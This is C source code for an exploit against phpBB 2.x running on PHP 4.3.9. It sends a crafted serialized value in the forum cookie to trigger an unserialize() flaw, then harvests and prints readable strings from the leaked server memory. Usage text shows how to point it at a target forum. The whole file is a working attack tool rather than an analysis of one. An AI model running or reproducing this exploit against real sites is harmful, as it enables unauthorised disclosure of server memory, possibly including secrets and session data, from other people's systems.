//phpBB 2.x & PHP 4.3.9 unserialize() Exploit for Linux
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <signal.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <linux/if_ether.h>
int goodcar(char carac)
{
unsigned short cpt;
if(!carac)
return 0;
// i hate do like this :/
char *goodcar="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ012345689<>é@à)]=}è[_-{#&*\\/-+~'ç$%.:;|^~$,!?\"\'\t\r\n";
for(cpt = 0;(goodcar[cpt] != '\0') && (goodcar[cpt] != carac);cpt++);
if(goodcar[cpt] == carac)
return 1;
return 0;
}
unsigned int utf8decode(char *utf)
{
char *r;
char *w;
char tmp;
int han;
r = w = utf;
while(*r)
{
if(*r =='%')
{
tmp = (char)alphanum(r+1,&han);
if(han)
{
*w = tmp;
r += 2;
}
else
*w = *r;
}
else
*w = *r;
w++;
r++;
};
*w = '\0';
return (w-utf);
}
int alphanum(char *of,char *wesh)
{
unsigned char retour;
retour = 0x00;
*wesh = 0;
if(!(*of && *(of+1)))
return 0x00;
if((*of >= 'a') && (*of <= 'f'))
retour = ((*of - 'a') +10) * 0x10;
else if((*of >= 'A') && (*of <= 'F'))
retour = ((*of - 'A') +10) * 0x10;
else if((*of >= '0') && (*of <= '9'))
retour = (*of - '0') * 0x10;
else
return 0x00;
of++;
if((*of >= 'a') && (*of <= 'f'))
retour += ((*of - 'a') +10);
else if((*of >= 'A') && (*of <= 'F'))
retour += ((*of - 'A') +10);
else if((*of >= '0') && (*of <= '9'))
retour += (*of - '0');
else
return 0x00;
*wesh = 1;
return retour;
}
int main(int argc,char *argv[])
{
int sockfd;
struct hostent *hp;
struct sockaddr_in server_addr;
char host[80],dir[80];
char recvbuf[1024];
char *getbuf;
int recvsize,nbmemread,compteur,cpt;
char str[1024];
strcpy(host,argv[1]);
strcpy(host,&host[7]);
strcpy(dir,host);
strtok(host,"/");//取得主机名
strcpy(dir,&dir[strlen(host)]);//取得目录名
char tmp[]="%22test1%22%3b";
char usage[]="usage:phpbb <URL> <size> <cookname>\n"
"eg:phpbb http://192.168.1.8/bbs 30000 phpbb2mysql\n";
if(argc!=4)
{
printf("%s",usage);
exit(0);
}
nbmemread=0;
compteur=0;
cpt=0;
sprintf(str,"GET %s HTTP/1.1\n"
"Host: %s\n"
"Cookie: %s_data=s:%s:%s; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=%s\n"
"Cookie: %s_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain=%s\n"
"Accept-Language: fr\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n"
"Connection: close\n\n",dir,host,argv[3],argv[2],tmp,host,argv[3],host);
// printf("%s\t%s\n",host,dir);
//printf("%s\n",str);
hp=gethostbyname(host);
//建立套接口
if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Create the Socket faild!\n");
exit(1);
}
else
{
//printf("Create the socket OK!\n");
}
bzero(&server_addr,sizeof(struct sockaddr_in));
server_addr.sin_family=AF_INET;
server_addr.sin_addr=*((struct in_addr *)hp->h_addr);
server_addr.sin_port=htons(80);
//与服务器建立连接
if(connect(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr))==-1)
{
printf("Connect the Server faild!\n");
}
else
{
//printf("Connect the Server OK!\n");
}
//发送数据
if(!send(sockfd,str,strlen(str),0))
{
printf("send the data faild!\n");
}
else
{
//printf("send date OK!\n");
}
sleep(1);
getbuf=(char *)malloc(1024);
//接收数据
while(1)
{
memset(recvbuf, 0, sizeof(recvbuf));
recvsize= recv(sockfd,recvbuf,1024,0);
if(recvsize>0)
{
//printf("%s\n",recvbuf);
strcat(getbuf,recvbuf);
if(strstr(recvbuf,";"))
{
break;
}
else
{
getbuf=(char *)realloc(getbuf,recvsize);
}
}
else
{
break;
}
}
char *data=strstr(getbuf,"phpbb2mysql_data=");
if(data==NULL)
{
printf("不可用=n");
exit(1);
}
data=&data[strlen("phpbb2mysql_data=")];
char *dataend=strstr(getbuf,";");
dataend[0]='\0';
nbmemread = utf8decode(data);
for(compteur = 0;compteur < nbmemread;)
{
for(cpt=compteur;goodcar(data[cpt]);cpt++);
if((cpt - compteur) > 3 )
{
char *wtmp = (char*)malloc((cpt - compteur)+1);
strncpy(wtmp,&data[compteur],cpt - compteur);
wtmp[cpt - compteur] = '\0';
printf("string detected : %s\n",wtmp);
free(wtmp);
}
if(!(cpt - compteur))
cpt++;
compteur = cpt;
}
printf("\n%s\n",getbuf);
//free(data);
free(getbuf);
}
|